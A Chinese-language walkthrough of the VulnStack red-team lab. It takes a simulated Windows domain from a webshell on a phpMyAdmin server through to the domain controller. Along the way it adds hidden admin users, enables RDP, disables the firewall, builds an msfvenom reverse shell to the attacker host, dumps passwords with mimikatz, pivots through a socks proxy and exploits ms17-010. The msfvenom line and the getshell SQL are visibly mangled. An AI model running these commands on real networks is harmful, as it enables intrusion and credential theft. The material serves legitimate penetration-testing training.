【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)

一、环境搭建

1.1 靶场下载

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

靶机通用密码: hongrisec@2019

登进去要修改密码,改为 HONGRISEC@2019

1.2 网卡配置

kali一个nat网卡,模拟外网攻击机

win7一个nat网卡,一个VMnet 1网卡,模拟web服务器

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第1张图片

win2003一个VMnet 1网卡,模拟内网域成员主机

win2008一个VMnet 1网卡,模拟内网域控主机

拓朴图如下:

(win7为VM1,win2003为VM2,win2008为VM3)

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第2张图片

设置完毕后VM1、VM2、VM3就在同一内网中了,只有VM1web服务器能够访问内网,所以要想访问win2008和win2003服务器必须要先拿下win7服务器,用它做跳板进内网进行横向渗透。

攻击机:

kali ip:192.168.168.133

win10 ip: 192.168.168.128

靶机:

win7 外网ip:192.168.168.134   内网ip:192.168.52.143

win03 ip: 192.168.52.141

win08 ip: 192.168.52.138

最后,在win7上使用phpstudy开启web服务。

配置完毕。

二、外网渗透

nmap扫描,发现开放了80、3306端口

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第3张图片

目录扫描

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第4张图片

先看一下phpmyadmin,访问,可以弱口令root/root登入

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第5张图片

可以利用general_log和general_log_file拿shell

服务器绝对路径可以在phpinfo里找到

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第6张图片

修改general_log_file为Web服务下的文件

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第7张图片

此时执行 select “”; 语句即可getshell

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第8张图片

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第9张图片

现在就已经拿到shell了。不过,我们现在还不着急往下走,基于学习的目的,我们看一下扫到的备份文件:

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第10张图片

备份了yxcms的源代码,可以猜测目标网站服务器上搭建了yxcms,访问http://192.168.168.134/yxcms/

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第11张图片

然后可以在互联网上搜索一下yxcms的历史漏洞,看一下能不能利用。

不过,这里比较简单,直接告诉了我们后台地址和密码

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第12张图片

在前台模板->管理模板文件->index_index.php处可编辑,插入PHP代码

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第13张图片

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第14张图片

这样第二种getshell的方式也出来了。

现在开始往下走。

三、内网渗透

3.1 尝试远程登录

查看当前用户权限,因为一般拿下window的话都会尝试去连接它的远程桌面,所以再查看一下3389端口开放情况

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第15张图片

手动开启3389:

我们使用以下命令开启它(win7、win2003、winxp),运行后显示3389端口已经成功开启(关闭命令把如下0都换成1):

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3c6148a44b70017426554458350802d5.png

添加用户

net user Yokan !@#123qwe!@# /add # 添加账户密码
net localgroup administrators Yokan /add # 给Yokan账户添加为管理员权限
net user Yokan # 查询是否成功添加Yokan用户

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第16张图片

使用账号:Yokan,密码:!@#123qwe!@# 登录远程桌面。但是登陆失败,nmap扫描3389端口发现状态为filtered。查看win7,防火墙开启了阻止所有与未在允许程序列表中的程序的连接,换句话说,设置了白名单,只能本地连接。

此时思路一般如下:

1.反弹一个msf的shell回来,尝试关闭防火墙

2.尝试使用隧道连接3389

因为是练习,所以两种方式都尝试一下

3.2 msf反弹shell

使用msfvenom生成payload文件,使用蚁剑上传到win7

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.168.133 LHOST=4444 -f exe > shell.exe

35f2607f962e7c8b5750fbb6c58209d9.png

msf开启监听,运行shell.exe,可以看到msf成功获得一个meterpreter

2195dc5b07fd996cae695fd5078bdade.png

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第17张图片

尝试基础提权成功

18dab2a20fa8533d830a1e8d090a3282.png

开启远程桌面

run post/windows/manage/enable_rdp

bce0da7f5734e3a6ffc3dfcf560a8eaa.png

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第18张图片

会生成一个文件,该文件可用来 再关闭远程桌面

run multi_console_command -r 文件地址

d3651e23b08109400c5cade349768cbf.png

3.3 使用隧道连接3389

尝试第二种方式连接3389,在Sunny-Ngrok的官网 https://www.ngrok.cc/ 注册一个账号(可以通过这个软件实现使用外链访问电脑本地项目的功能),登录之后选择隧道管理->开通隧道->选择一个服务器(frp或者ngrok)->开通隧道并获得一个隧道id->下载客户端->打开客户端启动工具->输入隧道id->本地远程登录。

开通隧道时隧道名称随意写,本地端口写想要转发出去的计算机ip及端口(可以为局域网内任意机器映射,这里填入想要转发的win7的ip及端口)

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第19张图片

打开Sunny-Ngrok启动工具,输入隧道id,显示成功连接

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第20张图片

本地填入域名端口远程连接,可以成功登陆,关闭防火墙(Sunny-Ngrok启动工具需要一直开着)

使用netsh advfirewall set allprofiles state off来关闭防火墙

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第21张图片

因为远程登录会断开该主机当前的连接,为了不惊动管理员,这里不远程登录了

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第22张图片

3.4使用mimikatz获取账号密码

方法一  蚁剑直接上传mimikatz

ac3004054215e4180e93158630d2b072.png

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第23张图片

方法二  meterpreter

加载mimikatz模块,加载模块前需要先将meterpreter迁移到64位的进程,而且该进程也需要是system权限运行的

migrate PID

load mimikatz

mimikatz_command -f sekurlsa::searchPasswords

ps命令查看进程ID,一般选择explorer.exe对应的PID,但是这里它不是system权限,选择注入其他合法进程

成功获得账号 Administrator 密码 HONGRISEC@2019

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第24张图片

3.5 派生Cobalt Strike权限

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第25张图片

b79125f6e7582416e6ce8b54bb125c16.png

3.6 域信息收集

渗透测试的本质是信息收集,先记录一些常用命令

net time /domain        #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
ipconfig /all        #查询本机IP段,所在域等
net config Workstation  #当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user           #本机用户列表
net group "domain computers" /domain   #查看域内所有的主机名
net group "domain admins" /domain      #查看域管理员
net group "domain controllers" /domain #查看域控
net localgroup administrators          #本机管理员[通常含有域用户]
net user 用户名 /domain                 #获取指定用户的账户信息  
net group /domain                      #查询域里面的工作组
net group 组名 /domain                  #查询域中的某工作组

ipconfig /all看到有内网ip,有域

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第26张图片

查询域列表  net view /domain

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第27张图片

查询同域机器  net view

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第28张图片

判断主域 net time /domain

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第29张图片

查询域用户 net user /domain

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第30张图片

查询当前计算机名、计算机全名、用户名、工作站、软件版本、工作站域、工作站域 DNS 名称、登录域    net config Workstation

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第31张图片

当前域中的计算机列表:  在cs中执行net view

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第32张图片

整理一下信息

域:god.org

域内有三个用户:Administrator、ligang、liukaifeng01

域内三台主机:ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)、OWA

域控:OWA(192.168.52.138)

win7内网ip:192.168.52.143

四、横向移动

4.1 添加路由、挂socks4a代理

添加路由的目的是为了让MSF其他模块能访问内网的其他主机,即52网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递

添加socks4a代理的目的是为了让其他软件更方便的访问到内网的其他主机的服务

(添加路由一定要在挂代理之前,因为代理需要用到路由功能)

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第33张图片

添加内网路由 run autoroute -s 192.168.52.0/24

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第34张图片

arp -a查看一下所有接口的当前 ARP 缓存表

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第35张图片

设置代理,设置成功后打开其他程序需在前面加上proxychains

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  

msf5 auxiliary(server/socks4a) > set SRVPORT 1080
SRVPORT => 1080
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.

[*] Starting the socks4a proxy server

然后打开/etc/proxychains.conf

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第36张图片

测试一下可以成功访问192.168.52.0网段

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第37张图片

4.2 拿下第二台主机

nmap扫描一下:

proxychains nmap -p 0-1000 -Pn -sT 192.168.52.141

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第38张图片

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第39张图片

proxychains nmap -p 3389 -Pn -sT 192.168.52.141

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第40张图片

proxychains nmap -Pn -sT 192.168.52.141

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第41张图片

开放了445端口,所以利用 use auxiliary/scanner/smb/smb_version 可以扫描系统版本,扫描结果是win2003

439facfb503559caec47cf816bf2ef8b.png

使用nmap --script=vuln 192.168.52.141  扫一下漏洞

使用msf辅助模块进行扫描,查看是否存在ms17-010漏洞

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第42张图片

三台机器都存在ms17-010

先看server2003这台主机

直接使用ms17-010打一个shell回来(这里要注意一下,msf内置的17-010打2003有时候多次执行后msf就接收不到session,而且ms17-010利用时,脆弱的server 2003非常容易蓝屏)

而且使用msf的代理之后就不能使用反向shell了,我们需要使用正向shell。

这里,我们可以先使用auxiliary/admin/smb/ms17_010_command来执行一些命令

use auxiliary/admin/smb/ms17_010_command
show options
set RHOSTS 192.168.52.141
set command net user Yokan !@#123qwe!@# /add #添加用户
run #成功执行
set command net localgroup administrators Yokan /add #管理员权限
run #成功执行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run #成功执行

这里特别注意,因为开启3389端口命令中有两个双引号,如果整条命令外面不用单引号扩一下,会出现一些符号闭合上的问题

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第43张图片

然后使用proxychains连接    proxychains rdesktop 192.168.52.141

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第44张图片

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第45张图片

然后使用exploit/windows/smb/ms17_010_psexec 尝试去打一个shell回来

正向shell

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第46张图片

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第47张图片

因为是2003的机器,直接getsystem便得到了system权限

1ab02d3837f3320bbd03384f9de1eb79.png

最后加载mimikatz模块获取账号密码

加载模块前需要先将meterpreter迁移到64位的进程,而且该进程也需要是system权限运行的

ps命令查看进程ID,一般选择explorer.exe对应的PID,但是这里它不是system权限,选择注入其他合法进程

migrate PID
load mimikatz
mimikatz_command -f sekurlsa::searchPasswords

4.3 拿下域控

在前面我们已经拿到了域用户的帐号密码,即administrator、HONGRISEC@2019我们现在要做的就是如何登录到域控上去

定位到域控制器的ip为192.168.52.138

还是先利用smb扫描系统版本   auxiliary/scanner/smb/smb_version

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第48张图片

因为之前抓到了域管理的账号密码所以直接使用 exploit/windows/smb/psexec 模块拿下域控,且是管理员权限

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第49张图片

【红日安全-VulnStack】ATT_CK实战系列——红队实战(—)_第50张图片

你可能感兴趣的:(渗透测试,网络安全,安全)